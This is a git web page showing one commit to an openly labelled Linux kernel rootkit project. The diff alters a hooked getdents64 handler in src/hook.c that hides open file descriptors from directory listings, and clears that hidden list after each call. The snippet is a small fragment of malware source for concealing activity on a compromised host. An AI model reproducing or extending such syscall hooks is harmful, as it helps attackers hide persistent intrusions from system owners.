linux-rootkit

Feature-rich interactive rootkit that targets Linux kernel 4.19, accompanied by a dynamic kernel memory analysis GDB plugin for in vivo introspection (e.g. using QEMU)
git clone git://git.deurzen.net/linux-rootkit
Log | Files | Refs
commit 5a8444a83fc6d1df17e42a9d39ef7d208cc6f3c2
parent 65326beeb178c63171971ae3e17ef187ae818f7b
Author: Tizian Leonhardt <tizianleonhardt@web.de>
Date:   Sat,  5 Dec 2020 19:38:01 +0100

Clear list after every fd dir

Diffstat:

Msrc/hook.c | 3++-


1 file changed, 2 insertions(+), 1 deletion(-)

diff --git a/src/hook.c b/src/hook.c
@@ -235,7 +235,7 @@ g7_getdents64(const struct pt_regs *pt_regs)
     
     if(rootkit.hiding_open_files && ((fd_pid = may_fd(dirfile)) != -1)) {
         is_fd = 1;
-        fill_fds(fd_pid);
+        add_fd_to_list(&hidden_fds, 0);
     }
 
     for (offset = 0; offset < ret;) {
@@ -262,6 +262,7 @@ g7_getdents64(const struct pt_regs *pt_regs)
     atomic_dec(&getdents64_count);
 
 yield:
+    clear_hidden_fds();
     kfree(kdirent);
     return ret;
 }